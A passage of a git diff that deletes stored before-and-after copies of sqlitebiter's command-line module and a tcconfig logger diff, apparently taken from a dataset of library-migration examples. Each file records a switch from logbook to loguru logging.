typepy.is_empty_sequence(files): - logger.error("require at least one file specification.\n\n{}".format(ctx.get_help())) -@@ -322,8 +309,7 @@ def url(ctx, url, format_name, encoding, proxy): - if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - -- initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) -- logger = make_logger("{:s} url".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) -+ initialize_logger("{:s} url".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - try: - app_configs = app_config_mgr.load() -@@ -373,8 +359,7 @@ def gs(ctx, credentials, title): - TITLE: Title of the Google Sheets to convert. - """ - -- initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) -- logger = make_logger("{:s} gs".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) -+ initialize_logger("{:s} gs".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" -@@ -410,7 +395,7 @@ def configure(ctx): - You can remove these settings by deleting '~/.sqlitebiter'. 
- """ - -- logger = make_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) -+ initialize_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - logger.debug("{} configuration file existence: {}".format(PROGRAM_NAME, app_config_mgr.exists)) - diff --git a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.source.py b/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.source.py deleted file mode 100644 index 0183165..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.source.py +++ /dev/null @@ -1,500 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import os -import sys -from textwrap import dedent - -import click -import logbook -import logbook.more -import msgfy -import path -import pytablereader as ptr -import simplesqlite as sqlite -import typepy - -from .__version__ import __version__ -from ._common import DEFAULT_DUP_COL_HANDLER -from ._config import ConfigKey, app_config_mgr -from ._const import IPYNB_FORMAT_NAME_LIST, PROGRAM_NAME, ExitCode -from ._enum import Context, DupDatabase -from .subcommand import FileConverter, GoogleSheetsConverter, UrlConverter - - -CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"], obj={}) -QUIET_LOG_LEVEL = logbook.NOTSET -COMMAND_EPILOG = dedent( - """\ - Documentation: https://sqlitebiter.rtfd.io/ - Issue tracker: https://github.com/thombashi/sqlitebiter/issues - """ -) - - -class Default(object): - OUTPUT_FILE = "out.sqlite" - ENCODING = "utf-8" - - -def create_database(database_path, dup_table): - db_path = path.Path(database_path) - dir_path = db_path.dirname() - - if typepy.is_not_null_string(dir_path): - dir_path.makedirs_p() - - is_create_db = not db_path.isfile() - - if dup_table == DupDatabase.APPEND: - return (sqlite.SimpleSQLite(db_path, "a"), is_create_db) - - return (sqlite.SimpleSQLite(db_path, "w"), is_create_db) - - -def make_logger(channel_name, log_level): - import appconfigpy - - logger = logbook.Logger(channel_name) - - if log_level == QUIET_LOG_LEVEL: - try: - logger.disable() - except AttributeError: - logger.disabled = True # to support Logbook<1.0.0 - - logger.level = log_level - ptr.set_log_level(log_level) - sqlite.set_log_level(log_level) - appconfigpy.set_log_level(log_level) - - return logger - - -def initialize_log_handler(log_level): - from logbook.more import ColorizedStderrHandler - - debug_format_str = ( - "[{record.level_name}] {record.channel} {record.func_name} " - "({record.lineno}): {record.message}" - ) - if log_level == logbook.DEBUG: - info_format_str = debug_format_str - else: - info_format_str = "[{record.level_name}] {record.channel}: {record.message}" - - ColorizedStderrHandler(level=logbook.DEBUG, format_string=debug_format_str).push_application() - ColorizedStderrHandler(level=logbook.INFO, format_string=info_format_str).push_application() - - -def finalize(con, converter, is_create_db): - converter.write_completion_message() - database_path = con.database_path - con.close() - - if all([os.path.isfile(database_path), converter.get_success_count() == 0, is_create_db]): - os.remove(database_path) - - return converter.get_return_code() - - -def load_convert_config(logger, config_filepath, subcommand): - import simplejson as json - import io - - if not config_filepath: - return {} - - if not os.path.isfile(config_filepath): - logger.debug("{} not found".format(config_filepath)) - return 
{} - - with io.open(config_filepath, encoding="utf-8") as f: - configs = json.load(f) - - return configs.get(subcommand) - - -@click.group(context_settings=CONTEXT_SETTINGS) -@click.version_option(version=__version__, message="%(prog)s %(version)s") -@click.option( - "-o", - "--output-path", - metavar="PATH", - default=Default.OUTPUT_FILE, - help="Output path of the SQLite database file. Defaults to '{:s}'.".format(Default.OUTPUT_FILE), -) -@click.option( - "-a", "--append", "is_append_table", is_flag=True, help="Append table(s) to existing database." -) -@click.option( - "--add-primary-key", - "add_pri_key_name", - metavar="PRIMARY_KEY_NAME", - help="Add 'PRIMARY KEY AUTOINCREMENT' column with the specified name.", -) -@click.option( - "--convert-config", - help=dedent( - """\ - [experimental] - Configurations for data conversion. The option can be used only for url subcommand. - """ - ), -) -@click.option( - "-i", - "--index", - "index_list", - metavar="INDEX_ATTR", - default="", - help="Comma separated attribute names to create indices.", -) -@click.option( - "--no-type-inference", - is_flag=True, - help="All of the columns assume as TEXT data type in creating tables.", -) -@click.option( - "--type-hint-header", - "is_type_hint_header", - is_flag=True, - help=dedent( - """\ - Use headers suffix as type hints. - If there are type hints, converting columns by datatype corresponding with type hints. - The following suffixes can be recognized as type hints (case insensitive): - "text": TEXT datatype. - "integer": INTEGER datatype. - "real": REAL datatype. - """ - ), -) -@click.option("--replace-symbol", "symbol_replace_value", help="Replace symbols in attributes.") -@click.option("-v", "--verbose", "verbosity_level", count=True) -@click.option("--debug", "log_level", flag_value=logbook.DEBUG, help="For debug print.") -@click.option( - "-q", - "--quiet", - "log_level", - flag_value=QUIET_LOG_LEVEL, - help="Suppress execution log messages.", -) -@click.pass_context -def cmd( - ctx, - output_path, - is_append_table, - add_pri_key_name, - convert_config, - index_list, - no_type_inference, - is_type_hint_header, - symbol_replace_value, - verbosity_level, - log_level, -): - ctx.obj[Context.OUTPUT_PATH] = output_path - ctx.obj[Context.SYMBOL_REPLACE_VALUE] = symbol_replace_value - ctx.obj[Context.DUP_DATABASE] = DupDatabase.APPEND if is_append_table else DupDatabase.OVERWRITE - ctx.obj[Context.ADD_PRIMARY_KEY_NAME] = add_pri_key_name - ctx.obj[Context.INDEX_LIST] = index_list.split(",") - ctx.obj[Context.CONVERT_CONFIG] = convert_config - ctx.obj[Context.TYPE_INFERENCE] = not no_type_inference - ctx.obj[Context.TYPE_HINT_HEADER] = is_type_hint_header - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level - ctx.obj[Context.LOG_LEVEL] = logbook.INFO if log_level is None else log_level - - sqlite.SimpleSQLite.dup_col_handler = DEFAULT_DUP_COL_HANDLER - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("files", type=str, nargs=-1) -@click.option( - "-r", "--recursive", is_flag=True, help="Read all files under each directory, recursively." 
-) -@click.option("--pattern", metavar="PATTERN", help="Convert files matching PATTERN.") -@click.option("--exclude", metavar="PATTERN", help="Exclude files matching PATTERN.") -@click.option("--follow-symlinks", is_flag=True, help="Follow symlinks.") -@click.option( - "-f", - "--format", - "format_name", - type=click.Choice(ptr.TableFileLoader.get_format_names() + IPYNB_FORMAT_NAME_LIST), - help="Data format to loading (auto-detect from file extensions in default).", -) -@click.option( - "--encoding", - metavar="ENCODING", - help="Encoding to load files. Auto-detection from files in default.", -) -@click.pass_context -def file(ctx, files, recursive, pattern, exclude, follow_symlinks, format_name, encoding): - """ - Convert tabular data within - CSV/Excel/HTML/JSON/Jupyter Notebook/LDJSON/LTSV/Markdown/Mediawiki/SQLite/SSV/TSV - file(s) or named pipes to a SQLite database file. - """ - - initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) - logger = make_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - if typepy.is_empty_sequence(files): - logger.error("require at least one file specification.\n\n{}".format(ctx.get_help())) - sys.exit(ExitCode.NO_INPUT) - - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" - ) - - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - converter = FileConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - format_name=format_name, - encoding=encoding, - exclude_pattern=exclude, - follow_symlinks=follow_symlinks, - ) - - for file_path in files: - dir_path_obj = path.Path(file_path) - - if not follow_symlinks and dir_path_obj.islink() and dir_path_obj.isdir(): - logger.debug( - "skip symlink to a directory: {} -> {}".format( - dir_path_obj, dir_path_obj.readlink() - ) - ) - continue - - if recursive and dir_path_obj.isdir(): - for file_path_obj in dir_path_obj.walkfiles(pattern): - converter.convert(file_path_obj) - else: - converter.convert(file_path) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("url", type=str) -@click.option( - "-f", - "--format", - "format_name", - type=click.Choice(ptr.TableUrlLoader.get_format_names() + IPYNB_FORMAT_NAME_LIST), - help="Data format to loading (defaults to html).", -) -@click.option( - "-e", - "--encoding", - type=str, - metavar="ENCODING", - help="HTML page read encoding. Defaults to {:s}.".format(Default.ENCODING), -) -@click.option( - "-p", - "--proxy", - type=str, - metavar="PROXY", - help="Specify a proxy in the form [user:passwd@]proxy.server:port.", -) -@click.pass_context -def url(ctx, url, format_name, encoding, proxy): - """ - Scrape tabular data from a URL and convert data to a SQLite database file. 
- """ - - if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) - logger = make_logger("{:s} url".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - try: - app_configs = app_config_mgr.load() - except ValueError as e: - logger.debug(msgfy.to_debug_message(e)) - app_configs = {} - - if typepy.is_empty_sequence(encoding): - encoding = app_configs.get(ConfigKey.DEFAULT_ENCODING) - logger.debug("use default encoding: {}".format(encoding)) - - if typepy.is_null_string(proxy): - proxy = app_configs.get(ConfigKey.PROXY_SERVER) - - convert_configs = load_convert_config(logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="url") - - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - converter = UrlConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - format_name=format_name, - encoding=encoding, - proxy=proxy, - ) - - converter.convert(url) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("credentials", type=click.Path(exists=True)) -@click.argument("title", type=str) -@click.pass_context -def gs(ctx, credentials, title): - """ - Convert a spreadsheet in Google Sheets to a SQLite database file. - - CREDENTIALS: OAuth2 Google credentials file. - TITLE: Title of the Google Sheets to convert. - """ - - initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) - logger = make_logger("{:s} gs".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" - ) - - converter = GoogleSheetsConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - ) - - converter.convert(credentials, title) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command() -@click.pass_context -def configure(ctx): - """ - Configure the following application settings: - - (1) Default encoding to load files. - (2) HTTP/HTTPS proxy server URI (for url sub-command). - - Configurations are written to '~/.sqlitebiter'. - You can remove these settings by deleting '~/.sqlitebiter'. - """ - - logger = make_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - logger.debug("{} configuration file existence: {}".format(PROGRAM_NAME, app_config_mgr.exists)) - - sys.exit(app_config_mgr.configure()) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("shell", type=click.Choice(["bash", "zsh"])) -@click.pass_context -def completion(ctx, shell): - """ - A helper command to setup command completion. 
- - To setup for bash: - - sqlitebiter completion bash >> ~/.bashrc - - To setup for zsh: - - sqlitebiter completion zsh >> ~/.zshrc - """ - - if shell == "bash": - click.echo( - dedent( - """\ - _sqlitebiter_completion() { - local IFS=$' - ' - COMPREPLY=( $( env COMP_WORDS="${COMP_WORDS[*]}" \ - COMP_CWORD=$COMP_CWORD \ - _SQLITEBITER_COMPLETE=complete $1 ) ) - return 0 - } - - _sqlitebiter_completionetup() { - local COMPLETION_OPTIONS="" - local BASH_VERSION_ARR=(${BASH_VERSION//./ }) - # Only BASH version 4.4 and later have the nosort option. - if [ ${BASH_VERSION_ARR[0]} -gt 4 ] || ([ ${BASH_VERSION_ARR[0]} -eq 4 ] && [ ${BASH_VERSION_ARR[1]} -ge 4 ]); then - COMPLETION_OPTIONS="-o nosort" - fi - - complete $COMPLETION_OPTIONS -F _sqlitebiter_completion sqlitebiter - } - """ - ) - ) - elif shell == "zsh": - click.echo( - dedent( - """\ - _sqlitebiter_completion() { - local -a completions - local -a completions_with_descriptions - local -a response - response=("${(@f)$( env COMP_WORDS="${words[*]}" \ - COMP_CWORD=$((CURRENT-1)) \ - _SQLITEBITER_COMPLETE="complete_zsh" \ - sqlitebiter )}") - - for key descr in ${(kv)response}; do - if [[ "$descr" == "_" ]]; then - completions+=("$key") - else - completions_with_descriptions+=("$key":"$descr") - fi - done - - if [ -n "$completions_with_descriptions" ]; then - _describe -V unsorted completions_with_descriptions -U -Q - fi - - if [ -n "$completions" ]; then - compadd -U -V unsorted -Q -a completions - fi - compstate[insert]="automenu" - } - - compdef _sqlitebiter_completion sqlitebiter; - """ - ) - ) - - -if __name__ == "__main__": - cmd() diff --git a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.target.py b/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.target.py deleted file mode 100644 index cd30b20..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.target.py +++ /dev/null @@ -1,485 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 - -""" -.. 
codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import os -import sys -from textwrap import dedent - -import click -import msgfy -import path -import pytablereader as ptr -import simplesqlite as sqlite -import typepy -from loguru import logger - -from .__version__ import __version__ -from ._common import DEFAULT_DUP_COL_HANDLER -from ._config import ConfigKey, app_config_mgr -from ._const import IPYNB_FORMAT_NAME_LIST, PROGRAM_NAME, ExitCode -from ._enum import Context, DupDatabase -from .subcommand import FileConverter, GoogleSheetsConverter, UrlConverter - - -CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"], obj={}) -QUIET_LOG_LEVEL = "QUIET" -COMMAND_EPILOG = dedent( - """\ - Documentation: https://sqlitebiter.rtfd.io/ - Issue tracker: https://github.com/thombashi/sqlitebiter/issues - """ -) - - -class Default(object): - OUTPUT_FILE = "out.sqlite" - ENCODING = "utf-8" - - -def create_database(database_path, dup_table): - db_path = path.Path(database_path) - dir_path = db_path.dirname() - - if typepy.is_not_null_string(dir_path): - dir_path.makedirs_p() - - is_create_db = not db_path.isfile() - - if dup_table == DupDatabase.APPEND: - return (sqlite.SimpleSQLite(db_path, "a"), is_create_db) - - return (sqlite.SimpleSQLite(db_path, "w"), is_create_db) - - -def initialize_logger(name, log_level): - logger.remove() - - if log_level == QUIET_LOG_LEVEL: - logger.disable(name) - return - - if log_level == "DEBUG": - log_format = ( - "{level: <8} | " - "{name}:{function}:{line} - {message}" - ) - else: - log_format = "[{level}] {message}" - - logger.add( - sys.stdout, colorize=True, format=log_format, level=log_level, - ) - logger.enable(name) - ptr.set_logger(True) - sqlite.set_logger(True) - # appconfigpy.set_logger(True) - - -def finalize(con, converter, is_create_db): - converter.write_completion_message() - database_path = con.database_path - con.close() - - if all([os.path.isfile(database_path), converter.get_success_count() == 0, is_create_db]): - os.remove(database_path) - - return converter.get_return_code() - - -def load_convert_config(logger, config_filepath, subcommand): - import simplejson as json - import io - - if not config_filepath: - return {} - - if not os.path.isfile(config_filepath): - logger.debug("{} not found".format(config_filepath)) - return {} - - with io.open(config_filepath, encoding="utf-8") as f: - configs = json.load(f) - - return configs.get(subcommand) - - -@click.group(context_settings=CONTEXT_SETTINGS) -@click.version_option(version=__version__, message="%(prog)s %(version)s") -@click.option( - "-o", - "--output-path", - metavar="PATH", - default=Default.OUTPUT_FILE, - help="Output path of the SQLite database file. Defaults to '{:s}'.".format(Default.OUTPUT_FILE), -) -@click.option( - "-a", "--append", "is_append_table", is_flag=True, help="Append table(s) to existing database." -) -@click.option( - "--add-primary-key", - "add_pri_key_name", - metavar="PRIMARY_KEY_NAME", - help="Add 'PRIMARY KEY AUTOINCREMENT' column with the specified name.", -) -@click.option( - "--convert-config", - help=dedent( - """\ - [experimental] - Configurations for data conversion. The option can be used only for url subcommand. 
- """ - ), -) -@click.option( - "-i", - "--index", - "index_list", - metavar="INDEX_ATTR", - default="", - help="Comma separated attribute names to create indices.", -) -@click.option( - "--no-type-inference", - is_flag=True, - help="All of the columns assume as TEXT data type in creating tables.", -) -@click.option( - "--type-hint-header", - "is_type_hint_header", - is_flag=True, - help=dedent( - """\ - Use headers suffix as type hints. - If there are type hints, converting columns by datatype corresponding with type hints. - The following suffixes can be recognized as type hints (case insensitive): - "text": TEXT datatype. - "integer": INTEGER datatype. - "real": REAL datatype. - """ - ), -) -@click.option("--replace-symbol", "symbol_replace_value", help="Replace symbols in attributes.") -@click.option("-v", "--verbose", "verbosity_level", count=True) -@click.option("--debug", "log_level", flag_value="DEBUG", help="For debug print.") -@click.option( - "-q", - "--quiet", - "log_level", - flag_value=QUIET_LOG_LEVEL, - help="Suppress execution log messages.", -) -@click.pass_context -def cmd( - ctx, - output_path, - is_append_table, - add_pri_key_name, - convert_config, - index_list, - no_type_inference, - is_type_hint_header, - symbol_replace_value, - verbosity_level, - log_level, -): - ctx.obj[Context.OUTPUT_PATH] = output_path - ctx.obj[Context.SYMBOL_REPLACE_VALUE] = symbol_replace_value - ctx.obj[Context.DUP_DATABASE] = DupDatabase.APPEND if is_append_table else DupDatabase.OVERWRITE - ctx.obj[Context.ADD_PRIMARY_KEY_NAME] = add_pri_key_name - ctx.obj[Context.INDEX_LIST] = index_list.split(",") - ctx.obj[Context.CONVERT_CONFIG] = convert_config - ctx.obj[Context.TYPE_INFERENCE] = not no_type_inference - ctx.obj[Context.TYPE_HINT_HEADER] = is_type_hint_header - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level - ctx.obj[Context.LOG_LEVEL] = "INFO" if log_level is None else log_level - - sqlite.SimpleSQLite.dup_col_handler = DEFAULT_DUP_COL_HANDLER - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("files", type=str, nargs=-1) -@click.option( - "-r", "--recursive", is_flag=True, help="Read all files under each directory, recursively." -) -@click.option("--pattern", metavar="PATTERN", help="Convert files matching PATTERN.") -@click.option("--exclude", metavar="PATTERN", help="Exclude files matching PATTERN.") -@click.option("--follow-symlinks", is_flag=True, help="Follow symlinks.") -@click.option( - "-f", - "--format", - "format_name", - type=click.Choice(ptr.TableFileLoader.get_format_names() + IPYNB_FORMAT_NAME_LIST), - help="Data format to loading (auto-detect from file extensions in default).", -) -@click.option( - "--encoding", - metavar="ENCODING", - help="Encoding to load files. Auto-detection from files in default.", -) -@click.pass_context -def file(ctx, files, recursive, pattern, exclude, follow_symlinks, format_name, encoding): - """ - Convert tabular data within - CSV/Excel/HTML/JSON/Jupyter Notebook/LDJSON/LTSV/Markdown/Mediawiki/SQLite/SSV/TSV - file(s) or named pipes to a SQLite database file. 
- """ - - initialize_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - if typepy.is_empty_sequence(files): - logger.error("require at least one file specification.\n\n{}".format(ctx.get_help())) - sys.exit(ExitCode.NO_INPUT) - - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" - ) - - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - converter = FileConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - format_name=format_name, - encoding=encoding, - exclude_pattern=exclude, - follow_symlinks=follow_symlinks, - ) - - for file_path in files: - dir_path_obj = path.Path(file_path) - - if not follow_symlinks and dir_path_obj.islink() and dir_path_obj.isdir(): - logger.debug( - "skip symlink to a directory: {} -> {}".format( - dir_path_obj, dir_path_obj.readlink() - ) - ) - continue - - if recursive and dir_path_obj.isdir(): - for file_path_obj in dir_path_obj.walkfiles(pattern): - converter.convert(file_path_obj) - else: - converter.convert(file_path) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("url", type=str) -@click.option( - "-f", - "--format", - "format_name", - type=click.Choice(ptr.TableUrlLoader.get_format_names() + IPYNB_FORMAT_NAME_LIST), - help="Data format to loading (defaults to html).", -) -@click.option( - "-e", - "--encoding", - type=str, - metavar="ENCODING", - help="HTML page read encoding. Defaults to {:s}.".format(Default.ENCODING), -) -@click.option( - "-p", - "--proxy", - type=str, - metavar="PROXY", - help="Specify a proxy in the form [user:passwd@]proxy.server:port.", -) -@click.pass_context -def url(ctx, url, format_name, encoding, proxy): - """ - Scrape tabular data from a URL and convert data to a SQLite database file. 
- """ - - if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - initialize_logger("{:s} url".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - try: - app_configs = app_config_mgr.load() - except ValueError as e: - logger.debug(msgfy.to_debug_message(e)) - app_configs = {} - - if typepy.is_empty_sequence(encoding): - encoding = app_configs.get(ConfigKey.DEFAULT_ENCODING) - logger.debug("use default encoding: {}".format(encoding)) - - if typepy.is_null_string(proxy): - proxy = app_configs.get(ConfigKey.PROXY_SERVER) - - convert_configs = load_convert_config(logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="url") - - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - converter = UrlConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - format_name=format_name, - encoding=encoding, - proxy=proxy, - ) - - converter.convert(url) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("credentials", type=click.Path(exists=True)) -@click.argument("title", type=str) -@click.pass_context -def gs(ctx, credentials, title): - """ - Convert a spreadsheet in Google Sheets to a SQLite database file. - - CREDENTIALS: OAuth2 Google credentials file. - TITLE: Title of the Google Sheets to convert. - """ - - initialize_logger("{:s} gs".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" - ) - - converter = GoogleSheetsConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - ) - - converter.convert(credentials, title) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command() -@click.pass_context -def configure(ctx): - """ - Configure the following application settings: - - (1) Default encoding to load files. - (2) HTTP/HTTPS proxy server URI (for url sub-command). - - Configurations are written to '~/.sqlitebiter'. - You can remove these settings by deleting '~/.sqlitebiter'. - """ - - initialize_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - logger.debug("{} configuration file existence: {}".format(PROGRAM_NAME, app_config_mgr.exists)) - - sys.exit(app_config_mgr.configure()) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("shell", type=click.Choice(["bash", "zsh"])) -@click.pass_context -def completion(ctx, shell): - """ - A helper command to setup command completion. 
- - To setup for bash: - - sqlitebiter completion bash >> ~/.bashrc - - To setup for zsh: - - sqlitebiter completion zsh >> ~/.zshrc - """ - - if shell == "bash": - click.echo( - dedent( - """\ - _sqlitebiter_completion() { - local IFS=$' - ' - COMPREPLY=( $( env COMP_WORDS="${COMP_WORDS[*]}" \ - COMP_CWORD=$COMP_CWORD \ - _SQLITEBITER_COMPLETE=complete $1 ) ) - return 0 - } - - _sqlitebiter_completionetup() { - local COMPLETION_OPTIONS="" - local BASH_VERSION_ARR=(${BASH_VERSION//./ }) - # Only BASH version 4.4 and later have the nosort option. - if [ ${BASH_VERSION_ARR[0]} -gt 4 ] || ([ ${BASH_VERSION_ARR[0]} -eq 4 ] && [ ${BASH_VERSION_ARR[1]} -ge 4 ]); then - COMPLETION_OPTIONS="-o nosort" - fi - - complete $COMPLETION_OPTIONS -F _sqlitebiter_completion sqlitebiter - } - """ - ) - ) - elif shell == "zsh": - click.echo( - dedent( - """\ - _sqlitebiter_completion() { - local -a completions - local -a completions_with_descriptions - local -a response - response=("${(@f)$( env COMP_WORDS="${words[*]}" \ - COMP_CWORD=$((CURRENT-1)) \ - _SQLITEBITER_COMPLETE="complete_zsh" \ - sqlitebiter )}") - - for key descr in ${(kv)response}; do - if [[ "$descr" == "_" ]]; then - completions+=("$key") - else - completions_with_descriptions+=("$key":"$descr") - fi - done - - if [ -n "$completions_with_descriptions" ]; then - _describe -V unsorted completions_with_descriptions -U -Q - fi - - if [ -n "$completions" ]; then - compadd -U -V unsorted -Q -a completions - fi - compstate[insert]="automenu" - } - - compdef _sqlitebiter_completion sqlitebiter; - """ - ) - ) - - -if __name__ == "__main__": - cmd() diff --git a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.diff b/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.diff deleted file mode 100644 index df6eed4..0000000 --- a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.diff +++ /dev/null @@ -1,88 +0,0 @@ -diff --git a/tcconfig/_logger.py b/tcconfig/_logger.py - index 9a009be2107f3590dfac23c214a189f900d45ce2..7ba8676b3b9347ef15142bfeba30d611822c154d 100644 - --- a/tcconfig/_logger.py - +++ b/tcconfig/_logger.py -@@ -3,62 +3,44 @@ - """ - - --import logbook -+import sys -+ - import simplesqlite - import subprocrunner -+from loguru import logger - - --def _disable_logger(l): -- try: -- l.disable() -- except AttributeError: -- l.disabled = True # to support Logbook<1.0.0 -- -- --logger = logbook.Logger("tcconfig") --_disable_logger(logger) -+MODULE_NAME = "tcconfig" - -+logger.disable(MODULE_NAME) - --def set_logger(is_enable): -- if is_enable != logger.disabled: -- # logger setting have not changed -- return - -+def set_logger(is_enable, propagation_depth=3): - if is_enable: -- try: -- logger.enable() -- except AttributeError: -- logger.disabled = False # to support Logbook<1.0.0 -+ logger.enable(MODULE_NAME) - else: -- _disable_logger(logger) -+ logger.disable(MODULE_NAME) -+ -+ if propagation_depth <= 0: -+ return - - simplesqlite.set_logger(is_enable) - subprocrunner.set_logger(is_enable) - - - def set_log_level(log_level): -- """ -- Set logging level of this module. The module using -- `logbook `__ module for logging. -- -- :param int log_level: -- One of the log level of the -- `logbook `__. -- Disabled logging if the ``log_level`` is ``logbook.NOTSET``. -- :raises 